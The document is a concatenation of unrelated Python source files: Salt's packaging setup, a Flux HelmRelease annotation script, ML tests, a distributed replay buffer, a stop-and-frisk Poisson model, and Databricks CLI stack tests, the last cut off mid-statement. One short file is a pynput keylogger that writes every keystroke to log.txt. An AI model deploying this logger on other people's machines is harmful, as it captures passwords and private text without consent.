data_files[0][1].extend( [ "doc/man/salt-api.1", "doc/man/salt-cp.1", "doc/man/salt-key.1", "doc/man/salt-minion.1", "doc/man/salt-syndic.1", "doc/man/salt-unity.1", "doc/man/spm.1", ] ) return data_files # *nix, so, we need all man pages data_files[0][1].extend( [ "doc/man/salt-api.1", "doc/man/salt-cloud.1", "doc/man/salt-cp.1", "doc/man/salt-key.1", "doc/man/salt-master.1", "doc/man/salt-minion.1", "doc/man/salt-proxy.1", "doc/man/spm.1", "doc/man/salt.1", "doc/man/salt-ssh.1", "doc/man/salt-syndic.1", "doc/man/salt-unity.1", ] ) return data_files @property def _property_install_requires(self): install_requires = [] if USE_STATIC_REQUIREMENTS is True: # We've been explicitly asked to use static requirements if IS_OSX_PLATFORM: for reqfile in SALT_OSX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_LINUX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) return install_requires elif USE_STATIC_REQUIREMENTS is False: # We've been explicitly asked NOT to use static requirements if IS_OSX_PLATFORM: for reqfile in SALT_OSX_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_BASE_REQUIREMENTS: install_requires += _parse_requirements_file(reqfile) else: # This is the old and default behavior if IS_OSX_PLATFORM: for reqfile in SALT_OSX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_BASE_REQUIREMENTS: install_requires += _parse_requirements_file(reqfile) return install_requires @property def _property_scripts(self): # Scripts common to all scenarios scripts = ["scripts/salt-call", "scripts/salt-run"] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: scripts.append("scripts/salt-ssh") if IS_WINDOWS_PLATFORM: return scripts scripts.extend(["scripts/salt-cloud", "scripts/spm"]) return scripts if IS_WINDOWS_PLATFORM: scripts.extend( [ "scripts/salt-api", "scripts/salt-cp", "scripts/salt-key", "scripts/salt-minion", "scripts/salt-syndic", "scripts/salt-unity", "scripts/spm", ] ) return scripts # *nix, so, we need all scripts scripts.extend( [ "scripts/salt", "scripts/salt-api", "scripts/salt-cloud", "scripts/salt-cp", "scripts/salt-key", "scripts/salt-master", "scripts/salt-minion", "scripts/salt-proxy", "scripts/salt-ssh", "scripts/salt-syndic", "scripts/salt-unity", "scripts/spm", ] ) return scripts @property def _property_entry_points(self): # console scripts common to all scenarios scripts = [ "salt-call = salt.scripts:salt_call", "salt-run = salt.scripts:salt_run", ] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: scripts.append("salt-ssh = salt.scripts:salt_ssh") if IS_WINDOWS_PLATFORM: return {"console_scripts": scripts} scripts.append("salt-cloud = salt.scripts:salt_cloud") return {"console_scripts": scripts} if IS_WINDOWS_PLATFORM: scripts.extend( [ "salt-api = salt.scripts:salt_api", "salt-cp = salt.scripts:salt_cp", "salt-key = salt.scripts:salt_key", "salt-minion = salt.scripts:salt_minion", "salt-syndic = salt.scripts:salt_syndic", "salt-unity = salt.scripts:salt_unity", "spm = salt.scripts:salt_spm", ] ) return {"console_scripts": scripts} # *nix, so, we need all scripts scripts.extend( [ "salt = salt.scripts:salt_main", "salt-api = salt.scripts:salt_api", "salt-cloud = salt.scripts:salt_cloud", "salt-cp = salt.scripts:salt_cp", "salt-key = salt.scripts:salt_key", "salt-master = salt.scripts:salt_master", "salt-minion = salt.scripts:salt_minion", "salt-ssh = salt.scripts:salt_ssh", "salt-syndic = salt.scripts:salt_syndic", "salt-unity = salt.scripts:salt_unity", "spm = salt.scripts:salt_spm", ] ) return {"console_scripts": scripts} # <---- Dynamic Data --------------------------------------------------------------------------------------------- # ----- Esky Setup ----------------------------------------------------------------------------------------------> def setup_esky(self): opt_dict = self.get_option_dict("bdist_esky") opt_dict["freezer_module"] = ("setup script", "bbfreeze") opt_dict["freezer_options"] = ( "setup script", {"includes": self.get_esky_freezer_includes()}, ) @property def _property_freezer_options(self): return {"includes": self.get_esky_freezer_includes()} def get_esky_freezer_includes(self): # Sometimes the auto module traversal doesn't find everything, so we # explicitly add it. The auto dependency tracking especially does not work for # imports occurring in salt.modules, as they are loaded at salt runtime. # Specifying includes that don't exist doesn't appear to cause a freezing # error. freezer_includes = [ "zmq.core.*", "zmq.utils.*", "ast", "csv", "difflib", "distutils", "distutils.version", "numbers", "json", "M2Crypto", "Cookie", "asyncore", "fileinput", "sqlite3", "email", "email.mime.*", "requests", "sqlite3", ] if HAS_ZMQ and hasattr(zmq, "pyzmq_version_info"): if HAS_ZMQ and zmq.pyzmq_version_info() >= (0, 14): # We're freezing, and when freezing ZMQ needs to be installed, so this # works fine if "zmq.core.*" in freezer_includes: # For PyZMQ >= 0.14, freezing does not need 'zmq.core.*' freezer_includes.remove("zmq.core.*") if IS_WINDOWS_PLATFORM: freezer_includes.extend( [ "imp", "win32api", "win32file", "win32con", "win32com", "win32net", "win32netcon", "win32gui", "win32security", "ntsecuritycon", "pywintypes", "pythoncom", "_winreg", "wmi", "site", "psutil", "pytz", ] ) elif IS_SMARTOS_PLATFORM: # we have them as requirements in pkg/smartos/esky/requirements.txt # all these should be safe to force include freezer_includes.extend( ["cherrypy", "python-dateutil", "pyghmi", "croniter", "mako", "gnupg"] ) elif sys.platform.startswith("linux"): freezer_includes.append("spwd") try: import yum # pylint: disable=unused-import freezer_includes.append("yum") except ImportError: pass elif sys.platform.startswith("sunos"): # (The sledgehammer approach) # Just try to include everything # (This may be a better way to generate freezer_includes generally) try: from bbfreeze.modulegraph.modulegraph import ModuleGraph mgraph = ModuleGraph(sys.path[:]) for arg in glob.glob("salt/modules/*.py"): mgraph.run_script(arg) for mod in mgraph.flatten(): if type(mod).__name__ != "Script" and mod.filename: freezer_includes.append(str(os.path.basename(mod.identifier))) except ImportError: pass return freezer_includes # <---- Esky Setup ----------------------------------------------------------------------------------------------- # ----- Overridden Methods --------------------------------------------------------------------------------------> def parse_command_line(self): args = distutils.dist.Distribution.parse_command_line(self) if not self.ssh_packaging and PACKAGED_FOR_SALT_SSH: self.ssh_packaging = 1 if self.ssh_packaging: self.metadata.name = "salt-ssh" self.salt_transport = "ssh" elif self.salt_transport is None: self.salt_transport = "zeromq" if self.salt_transport not in ("zeromq", "both", "ssh", "none"): raise DistutilsArgError( "The value of --salt-transport needs be 'zeromq', " "'both', 'ssh', or 'none' not '{}'".format(self.salt_transport) ) # Setup our property functions after class initialization and # after parsing the command line since most are set to None # ATTENTION: This should be the last step before returning the args or # some of the requirements won't be correctly set for funcname in dir(self): if not funcname.startswith("_property_"): continue property_name = funcname.split("_property_", 1)[-1] setattr(self, property_name, getattr(self, funcname)) return args # <---- Overridden Methods --------------------------------------------------------------------------------------- # <---- Custom Distribution Class ------------------------------------------------------------------------------------ if __name__ == "__main__": setup(distclass=SaltDistribution)
the-stack_106_24316
#!/usr/bin/env python3 """Updates HelmReleases with an annotation consumeable by rennovate. This script adds annotations fo HelmRelease files so that rennovate can manage chart upgrades. This script accepts a --cluster-path argument which should point at a fluxv2 repository that contains Kustomization yaml files, referring to HelmReleases. The script takes a few steps: - Find all HelmRepository entries in the cluster, and its associated chart url - Find all HelmReleases that reference a HelmRepository - Update all files that contain HelmReleases, with an annotation to reference the chart url for the repository. This is done as a second pass to handle and kustomize overlays. """ import logging import os import subprocess from pathlib import Path import click import yaml DEFAULT_NAMESPACE = "default" INCLUDE_FILES = [".yaml", ".yml"] HELM_REPOSITORY_APIVERSIONS = ["source.toolkit.fluxcd.io/v1beta1"] HELM_RELEASE_APIVERSIONS = ["helm.toolkit.fluxcd.io/v2beta1"] RENOVATE_STRING = "# renovate: registryUrl=" class ClusterPath(click.ParamType): name = "cluster-path" def convert(self, value, param, ctx): clusterPath = Path(value) if not isinstance(value, tuple): if not clusterPath.exists: self.fail(f"invalid --cluster-path '{value}'") return clusterPath def yaml_load_files(files): """A generator that loads the contents of all files in yaml.""" for file in files: for doc in yaml.safe_load_all(file.read_bytes()): if doc: yield (file, doc) def kind_filter(kind, api_versions): """Return a yaml doc filter for specified resource type and version.""" def func(pair): (file, doc) = pair if doc.get("kind") != kind: return False return doc.get("apiVersion") in api_versions return func def namespaced_name(doc): """Return a named yaml resource, falling back to a default namespace.""" name = doc["name"] namespace = doc.get("namespace", DEFAULT_NAMESPACE) return f"{namespace}/{name}" @click.command() @click.option( "--cluster-path", envvar="CLUSTER_PATH", type=ClusterPath(), required=True, help="Path to cluster root, e.g. './cluster'" ) @click.option( "--debug", envvar="DEBUG", is_flag=True, default=False, required=False, help="Turn on debug logging" ) @click.option( "--dry-run", envvar="DRY_RUN", is_flag=True, default=False, required=False, help="Do not alter Helm Release files" ) @click.pass_context def cli(ctx, cluster_path, debug, dry_run): ctx.obj = { "cluster_path": cluster_path, "debug": debug, "dry_run": dry_run } # pylint: disable=no-value-for-parameter log = logger() files = [p for p in cluster_path.rglob("*") if p.suffix in INCLUDE_FILES] yaml_docs = list(yaml_load_files(files)) # Build a map of HelmRepository name to chart url helm_repo_charts = {} is_helm_repo = kind_filter("HelmRepository", HELM_REPOSITORY_APIVERSIONS) for (file, doc) in filter(is_helm_repo, yaml_docs): helm_repo_name = namespaced_name(doc["metadata"]) helm_repo_url = doc["spec"]["url"] log.info(f"Found HelmRepository '{helm_repo_name}' url '{helm_repo_url}'") helm_repo_charts[helm_repo_name] = helm_repo_url # Walk all HelmReleases and create a map of release names to repos. is_helm_release = kind_filter("HelmRelease", HELM_RELEASE_APIVERSIONS) helm_release_docs = list(filter(is_helm_release, yaml_docs)) helm_releases = {} for (file, doc) in helm_release_docs: helm_release_name = namespaced_name(doc["metadata"]) chart_spec = doc["spec"]["chart"]["spec"] source_ref = chart_spec.get("sourceRef") if not source_ref: # This release may be an overlay, so the repo name could be inferred from the # release name of the base HelmRelease in a second pass below. log.debug(f"Skipping '{helm_release_name}': No 'sourceRef' in spec.chart.spec") continue helm_repo_name = namespaced_name(source_ref) if helm_repo_name not in helm_repo_charts: log.warning(f"Skipping '{helm_release_name}': No HelmRepository for '{helm_repo_name}'") continue if helm_release_name in helm_releases: if helm_releases[helm_release_name] != helm_repo_name: log.warning(f"HelmRelease '{helm_release_name}' mismatched repo '{helm_repo_name}'") continue log.info(f"Found HelmRelease '{helm_release_name}' with repo '{helm_repo_name}'") helm_releases[helm_release_name] = helm_repo_name # Walk all HelmReleases and find the referenced HelmRepository by the # chart sourceRef and update the renovate annotation. for (file, doc) in helm_release_docs: helm_release_name = namespaced_name(doc["metadata"]) if helm_release_name not in helm_releases: log.debug(f"Skipping '{helm_release_name}': Could not determine repo") continue # Renovate can only update chart specs that contain a name and version, # so don't bother annotating if its not present. chart_spec = doc["spec"]["chart"]["spec"] if "chart" not in chart_spec or "version" not in chart_spec: log.debug(f"Skipping '{helm_release_name}': No 'chart' or 'version' in spec.chart.spec") continue helm_repo_name = helm_releases[helm_release_name] if helm_repo_name not in helm_repo_charts: log.debug(f"Skipping '{file}': Not HelmRepostory '{helm_repo_name}' found") continue chart_url = helm_repo_charts[helm_repo_name] if dry_run: log.warning( f"Skipping '{helm_repo_name}' annotations in '{file}' with '{chart_url}' as this is a dry run" ) continue log.info( f"Updating '{helm_repo_name}' renovate annotations in '{file}' with '{chart_url}'" ) with open(file, mode="r") as fid: lines = fid.read().splitlines() with open(file, mode="w") as fid: for line in lines: if RENOVATE_STRING in line: continue if " chart: " in line: indent_spaces = len(line) - len(line.lstrip()) fid.write(f"{' ' * indent_spaces}{RENOVATE_STRING}{chart_url}\n") pass fid.write(f"{line}\n") @click.pass_context def logger(ctx): """Set up logging """ logging.basicConfig( level=(logging.DEBUG if ctx.obj["debug"] else logging.INFO), format="%(asctime)s %(name)s %(levelname)-8s %(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) return logging.getLogger("Renovate Helm Releases") if __name__ == "__main__": # pylint: disable=no-value-for-parameter cli()
the-stack_106_24317
import os import unittest from kaggler.online_model import SGD DUMMY_SPARSE_STR = """0 1:1 3:1 10:1 0 3:1 5:1 1 4:1 6:1 8:1 10:1""" DUMMY_Y = [0, 0, 1] DUMMY_LEN_X = [3, 2, 4] class TestSGD(unittest.TestCase): def setUp(self): self.model = SGD(n=2**10, a=0.1, l1=1, l2=1, interaction=True) self.sparse_file = '/tmp/dummy.sps' """Create dummpy sparse files.""" with open(self.sparse_file, 'w') as f: f.write(DUMMY_SPARSE_STR) def tearDown(self): # If a dummy file exists, remove it. if os.path.isfile(self.sparse_file): os.remove(self.sparse_file) def test_read_sparse(self): len_xs = [] ys = [] for x, y in self.model.read_sparse(self.sparse_file): # check hash collision for feature index self.assertEqual(len(set(x)), len(x)) ys.append(y) len_xs.append(len(x)) # check if target values are correct self.assertEqual(ys, DUMMY_Y) # check if the number of feature index are correct self.assertEqual(len_xs, DUMMY_LEN_X) if __name__ == '__main__': unittest.main()
the-stack_106_24319
from typing import Union, Dict, List, Any, Callable from threading import RLock from ..transition import Transition from .buffer import Buffer from machin.parallel.distributed import RpcGroup import torch as t import numpy as np import itertools as it def _round_up(num): return int(np.ceil(num)) class DistributedBuffer(Buffer): def __init__(self, buffer_name: str, group: RpcGroup, buffer_size: int, *_, **__): """ Create a distributed replay buffer instance. To avoid issues caused by tensor device difference, all transition objects are stored in device "cpu". Distributed replay buffer constitutes of many local buffers held per process, transmissions between processes only happen during sampling. During sampling, the tensors in "state", "action" and "next_state" dictionaries, along with "reward", will be concatenated in dimension 0. any other custom keys specified in ``**kwargs`` will not be concatenated. .. seealso:: :class:`.Buffer` Note: Since ``append()`` operates on the local buffer, in order to append to the distributed buffer correctly, please make sure that your actor is also the local buffer holder, i.e. a member of the ``group`` Args: buffer_size: Maximum local buffer size. group: Process group which holds this buffer. buffer_name: A unique name of your buffer. """ super().__init__(buffer_size, "cpu") self.buffer_name = buffer_name self.group = group assert group.is_member() # register services, so that we may access other buffers _name = "/" + group.get_cur_name() self.group.register(buffer_name + _name + "/_size_service", self._size_service) self.group.register( buffer_name + _name + "/_clear_service", self._clear_service ) self.group.register( buffer_name + _name + "/_sample_service", self._sample_service ) self.wr_lock = RLock() def append( self, transition: Union[Transition, Dict], required_attrs=("state", "action", "next_state", "reward", "terminal"), ): # DOC INHERITED with self.wr_lock: super().append(transition, required_attrs=required_attrs) def clear(self): """ Clear current local buffer. """ with self.wr_lock: return super().clear() def all_clear(self): """ Remove all entries from all local buffers. """ future = [ self.group.registered_async(self.buffer_name + "/" + m + "/_clear_service") for m in self.group.get_group_members() ] for fut in future: fut.wait() def size(self): """ Returns: Length of current local buffer. """ with self.wr_lock: return super().size() def all_size(self): """ Returns: Total length of all buffers. """ future = [] count = 0 for m in self.group.get_group_members(): future.append( self.group.registered_async( self.buffer_name + "/" + m + "/_size_service" ) ) for fut in future: count += fut.wait() return count def sample_batch( self, batch_size: int, concatenate: bool = True, device: Union[str, t.device] = None, sample_method: Union[Callable, str] = "random_unique", sample_attrs: List[str] = None, additional_concat_attrs: List[str] = None, *_, **__, ) -> Any: # DOC INHERITED p_num = self.group.size() local_batch_size = _round_up(batch_size / p_num) future = [ self.group.registered_async( self.buffer_name + "/" + m + "/_sample_service", args=(local_batch_size, sample_method), ) for m in self.group.get_group_members() ] results = [fut.wait() for fut in future] all_batch_size = sum([r[0] for r in results]) all_batch = list(it.chain(*[r[1] for r in results])) if device is None: device = "cpu" if sample_attrs is None: sample_attrs = all_batch[0].keys() if additional_concat_attrs is None: additional_concat_attrs = [] return ( all_batch_size, Buffer.post_process_batch( all_batch, device, concatenate, sample_attrs, additional_concat_attrs ), ) def _size_service(self): # pragma: no cover return self.size() def _clear_service(self): # pragma: no cover self.clear() def _sample_service(self, batch_size, sample_method): # pragma: no cover if isinstance(sample_method, str): if not hasattr(self, "sample_method_" + sample_method): raise RuntimeError( f"Cannot find specified sample method: {sample_method}" ) sample_method = getattr(self, "sample_method_" + sample_method) # sample raw local batch from local buffer with self.wr_lock: local_batch_size, local_batch = sample_method(self.buffer, batch_size) return local_batch_size, local_batch
the-stack_106_24320
""" Implementation of the hierarchical poisson glm model, with a precinct-specific term, an ethnicity specific term, and an offset term. The data are tuples of (ethnicity, precinct, num_stops, total_arrests), where the count variables num_stops and total_arrests refer to the number of stops and total arrests of an ethnicity in the specified precinct over a period of 15 months. The rate we are measuring is the rate of stops-per-arrest for certain ethnicities in different precincts. Y_ep = num stops of ethnicity e in precinct p N_ep = num arests of e in p log lam_ep = alpha_e + beta_p + mu + log(N_ep * 15/12) #yearly correction term Y_ep ~ Pois(lam_ep) """ import numpy as np import numpy.random as npr import scipy.misc as scpm import pandas as pd import os # credit dataset def process_dataset(): data_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, os.pardir)) + "/data/datasets/frisk_with_noise.dat" df = pd.read_csv(data_dir, skiprows=6, delim_whitespace=True) # compute proportion black in precinct, black = 1 # first aggregate by precinct/ethnicity, and sum over populations popdf = df[['pop', 'precinct', 'eth']]. \ groupby(['precinct', 'eth'])['pop'].apply(sum) percent_black = np.array([ popdf[i][1] / float(popdf[i].sum()) for i in range(1, 76)] ) precinct_type = pd.cut(percent_black, [0, .1, .4, 1.]) # df['precinct_type'] = precinct_type.codes[df.precinct.values-1] return df df = process_dataset() def make_model_funs(crime=1., precinct_type=1): """ crime: 1=violent, 2=weapons, 3=property, 4=drug eth : 1=black, 2 = hispanic, 3=white precincts: 1-75 precinct_type = (0, .1], (.1, .4], (.4, 1.] """ # subselect crime/precinct, set up design matrix sdf = df[ (df['crime']==crime) & (df['precinct_type']==precinct_type) ] # make dummies for precincts, etc one_hot = lambda x, k: np.array(x[:,None] == np.arange(k)[None, :], dtype=int) precincts = np.sort(np.unique(sdf['precinct'])) Xprecinct = one_hot(sdf['precinct'], 76)[:, precincts] Xeth = one_hot(sdf['eth'], 4)[:, 1:-1] yep = sdf['stops'].values lnep = np.log(sdf['past.arrests'].values) + np.log(15./12) num_eth = Xeth.shape[1] num_precinct = Xprecinct.shape[1] # unpack a flat param vector aslice = slice(0, num_eth) bslice = slice(num_eth, num_eth + num_precinct) mslice = slice(bslice.stop, bslice.stop + 1) lnsa_slice = slice(mslice.stop, mslice.stop + 1) lnsb_slice = slice(lnsa_slice.stop, lnsa_slice.stop+1) num_params = lnsb_slice.stop pname = lambda s, stub: ['%s_%d'%(stub, i) for i in range(s.stop-s.start)] param_names = [pname(s, stub) for s, stub in zip([aslice, bslice, mslice, lnsa_slice, lnsb_slice], ['alpha', 'beta', 'mu', 'lnsigma_a', 'lnsigma_b'])] param_names = [s for pn in param_names for s in pn] def unpack(th): """ unpack vectorized lndf """ th = np.atleast_2d(th) alpha_eth, beta_prec, mu, lnsigma_alpha, lnsigma_beta = \ th[:, aslice], th[:, bslice], th[:, mslice], \ th[:, lnsa_slice], th[:, lnsb_slice] return alpha_eth, beta_prec, mu, lnsigma_alpha, lnsigma_beta hyper_lnstd = np.array([[np.log(10.)]]) def lnpdf(th): # params alpha, beta, mu, lns_alpha, lns_beta = unpack(th) # priors ll_alpha = normal_lnpdf(alpha, 0, lns_alpha) ll_beta = normal_lnpdf(beta, 0, lns_beta) ll_mu = normal_lnpdf(mu, 0, hyper_lnstd) ll_salpha = normal_lnpdf(np.exp(lns_alpha), 0, hyper_lnstd) ll_sbeta = normal_lnpdf(np.exp(lns_beta), 0, hyper_lnstd) logprior = ll_alpha + ll_beta + ll_mu + ll_salpha + ll_sbeta # likelihood lnlam = (mu + lnep[None,:]) + \ np.dot(alpha, Xeth.T) + np.dot(beta, Xprecinct.T) loglike = np.sum(lnpoiss(yep, lnlam), 1) return (loglike + logprior).squeeze() return lnpdf, unpack, num_params, sdf, param_names from scipy.special import gammaln def lnpoiss(y, lnlam): """ log likelihood of poisson """ return y*lnlam - np.exp(lnlam) - gammaln(y+1) def normal_lnpdf(x, mean, ln_std): x = np.atleast_2d(x) D = x.shape[1] dcoef = 1. if ln_std.shape[1] != D: dcoef = D qterm = -.5 * np.sum((x - mean)**2 / np.exp(2.*ln_std), axis=1) coef = -.5*D * np.log(2.*np.pi) - dcoef * np.sum(ln_std, axis=1) return qterm + coef
the-stack_106_24321
import pynput from datetime import datetime from pynput.keyboard import Key, Listener count= 0 keys = [] def on_press(key): global keys, count keys.append(key) count +=1 if count >= 1: k = str(key).replace("'", "") if k.find("space") > 0: print(keys) count =0 write_file(keys) keys = [] def write_file(keys): with open("log.txt", "a") as file: for key in keys: k = str(key).replace("'","") if k.find("space")>0: file.write('\n') elif k.find("esc")>0: file.write('\n') if k.find("Key")== -1: file.write(k) def on_release(key): if key==Key.esc: return False with Listener(on_press=on_press, on_release=on_release) as listener: listener.join()
the-stack_106_24323
# Databricks CLI # Copyright 2018 Databricks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"), except # that the use of services to which certain application programming # interfaces (each, an "API") connect requires that the user first obtain # a license for the use of the APIs from Databricks, Inc. ("Databricks"), # by creating an account at www.databricks.com and agreeing to either (a) # the Community Edition Terms of Service, (b) the Databricks Terms of # Service, or (c) another written agreement between Licensee and Databricks # for the use of the APIs. # # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint:disable=redefined-outer-name # pylint:disable=too-many-locals # pylint:disable=unused-argument import os import copy import mock from requests.exceptions import HTTPError import pytest import databricks_cli.stack.api as api import databricks_cli.workspace.api as workspace_api from databricks_cli.stack.exceptions import StackError from databricks_cli.version import version as CLI_VERSION TEST_JOB_SETTINGS = { api.JOBS_RESOURCE_NAME: 'test job' } TEST_JOB_NONEXISTING_SETTINGS = { api.JOBS_RESOURCE_NAME: 'non-existing test job in workspace' } TEST_JOB_RESOURCE_ID = 'test job' TEST_JOB_RESOURCE = { api.RESOURCE_ID: TEST_JOB_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_PROPERTIES: TEST_JOB_SETTINGS } TEST_JOB_DATABRICKS_ID = {api.JOBS_RESOURCE_JOB_ID: 1234} TEST_WORKSPACE_NB_PROPERTIES = { api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/notebook.py', api.WORKSPACE_RESOURCE_PATH: '/test/notebook.py', api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.NOTEBOOK } TEST_WORKSPACE_DIR_PROPERTIES = { api.WORKSPACE_RESOURCE_SOURCE_PATH: 'test/workspace/dir', api.WORKSPACE_RESOURCE_PATH: '/test/dir', api.WORKSPACE_RESOURCE_OBJECT_TYPE: workspace_api.DIRECTORY } TEST_WORKSPACE_NB_DATABRICKS_ID = {api.WORKSPACE_RESOURCE_PATH: '/test/notebook.py'} TEST_WORKSPACE_DIR_DATABRICKS_ID = {api.WORKSPACE_RESOURCE_PATH: '/test/dir'} TEST_DBFS_FILE_PROPERTIES = { api.DBFS_RESOURCE_SOURCE_PATH: 'test.jar', api.DBFS_RESOURCE_PATH: 'dbfs:/test/test.jar', api.DBFS_RESOURCE_IS_DIR: False } TEST_DBFS_DIR_PROPERTIES = { api.DBFS_RESOURCE_SOURCE_PATH: 'test/dbfs/dir', api.DBFS_RESOURCE_PATH: 'dbfs:/test/dir', api.DBFS_RESOURCE_IS_DIR: True } TEST_DBFS_FILE_DATABRICKS_ID = {api.DBFS_RESOURCE_PATH: 'dbfs:/test/test.jar'} TEST_DBFS_DIR_DATABRICKS_ID = {api.DBFS_RESOURCE_PATH: 'dbfs:/test/dir'} TEST_RESOURCE_ID = 'test job' TEST_RESOURCE_WORKSPACE_NB_ID = 'test notebook' TEST_RESOURCE_WORKSPACE_DIR_ID = 'test directory' TEST_WORKSPACE_NB_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_NB_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_PROPERTIES: TEST_WORKSPACE_NB_PROPERTIES } TEST_WORKSPACE_DIR_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_DIR_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_PROPERTIES: TEST_WORKSPACE_DIR_PROPERTIES } TEST_RESOURCE_DBFS_FILE_ID = 'test dbfs file' TEST_RESOURCE_DBFS_DIR_ID = 'test dbfs directory' TEST_DBFS_FILE_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_FILE_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_PROPERTIES: TEST_DBFS_FILE_PROPERTIES } TEST_DBFS_DIR_RESOURCE = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_DIR_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_PROPERTIES: TEST_DBFS_DIR_PROPERTIES } TEST_JOB_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_JOB_DATABRICKS_ID } TEST_WORKSPACE_NB_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_NB_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_WORKSPACE_NB_DATABRICKS_ID } TEST_WORKSPACE_DIR_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_WORKSPACE_DIR_ID, api.RESOURCE_SERVICE: api.WORKSPACE_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_WORKSPACE_DIR_DATABRICKS_ID } TEST_DBFS_FILE_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_FILE_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_DBFS_FILE_DATABRICKS_ID } TEST_DBFS_DIR_STATUS = { api.RESOURCE_ID: TEST_RESOURCE_DBFS_DIR_ID, api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_DATABRICKS_ID: TEST_DBFS_DIR_DATABRICKS_ID } TEST_STACK = { api.STACK_NAME: "test-stack", api.STACK_RESOURCES: [ TEST_JOB_RESOURCE, TEST_WORKSPACE_NB_RESOURCE, TEST_WORKSPACE_DIR_RESOURCE, TEST_DBFS_FILE_RESOURCE, TEST_DBFS_DIR_RESOURCE, { api.RESOURCE_ID: "NoStatusResource", api.RESOURCE_SERVICE: api.DBFS_SERVICE, api.RESOURCE_WRITE_STATUS: False, api.RESOURCE_PROPERTIES: { api.DBFS_RESOURCE_SOURCE_PATH: 'test.jar', api.DBFS_RESOURCE_PATH: 'dbfs:/test/test-no-status.jar', api.DBFS_RESOURCE_IS_DIR: False } } ] } TEST_STATUS = { api.STACK_NAME: "test-stack", api.CLI_VERSION_KEY: CLI_VERSION, api.STACK_DEPLOYED: [TEST_JOB_STATUS, TEST_WORKSPACE_NB_STATUS, TEST_WORKSPACE_DIR_STATUS, TEST_DBFS_FILE_STATUS, TEST_DBFS_DIR_STATUS, ] } class _TestJobsClient(object): def __init__(self): self.jobs_in_databricks = {} self.available_job_id = [1234, 12345] self.nonexisting_job_id = 111 def get_job(self, job_id, headers=None): if job_id not in self.jobs_in_databricks: # Job created is not found. raise HTTPError('Job not Found') else: return self.jobs_in_databricks[job_id] def reset_job(self, data, headers=None): if data[api.JOBS_RESOURCE_JOB_ID] not in self.jobs_in_databricks: raise HTTPError('Job Not Found') self.jobs_in_databricks[data[api.JOBS_RESOURCE_JOB_ID]]['job_settings'] = \ data['new_settings'] def create_job(self, job_settings, headers=None): job_id = self.available_job_id.pop() new_job_json = {api.JOBS_RESOURCE_JOB_ID: job_id, 'job_settings': job_settings.copy(), 'creator_user_name': '[email protected]', 'created_time': 987654321} self.jobs_in_databricks[job_id] = new_job_json return new_job_json def _list_jobs_by_name(self, job_name, headers=None): return [job for job in self.jobs_in_databricks.values() if job['job_settings']['name'] == job_name] @pytest.fixture() def stack_api(): workspace_api_mock = mock.patch('databricks_cli.stack.api.WorkspaceApi') jobs_api_mock = mock.patch('databricks_cli.stack.api.JobsApi') dbfs_api_mock = mock.patch('databricks_cli.stack.api.DbfsApi') workspace_api_mock.return_value = mock.MagicMock() jobs_api_mock.return_value = mock.MagicMock() dbfs_api_mock.return_value = mock.MagicMock() stack_api = api.StackApi(mock.MagicMock()) yield stack_api class TestStackApi(object): def test_deploy_job(self, stack_api): """ stack_api._deploy_job should create a new job when 1) A databricks_id is not given and a job with the same name does not exist in the settings. stack_api._deploy_job should reset/update an existing job when 1) A databricks_id is given 2) A databricks_id is not given but one job with the same name exists. A StackError should be raised when 1) A databricks_id is not given but there are multiple jobs with the same name that exist. """ test_job_settings = TEST_JOB_SETTINGS # Different name than TEST_JOB_SETTINGS alt_test_job_settings = {api.JOBS_RESOURCE_NAME: 'alt test job'} stack_api.jobs_client = _TestJobsClient() # TEST CASE 1: # stack_api._deploy_job should create job if databricks_id not given job doesn't exist res_databricks_id_1 = stack_api._deploy_job(test_job_settings) assert res_databricks_id_1 == {api.JOBS_RESOURCE_JOB_ID: 12345} # TEST CASE 2: # stack_api._deploy_job should reset job if databricks_id given. res_databricks_id_2 = stack_api._deploy_job(alt_test_job_settings, res_databricks_id_1) # physical job id not changed from last update assert res_databricks_id_2[api.JOBS_RESOURCE_JOB_ID] == \ 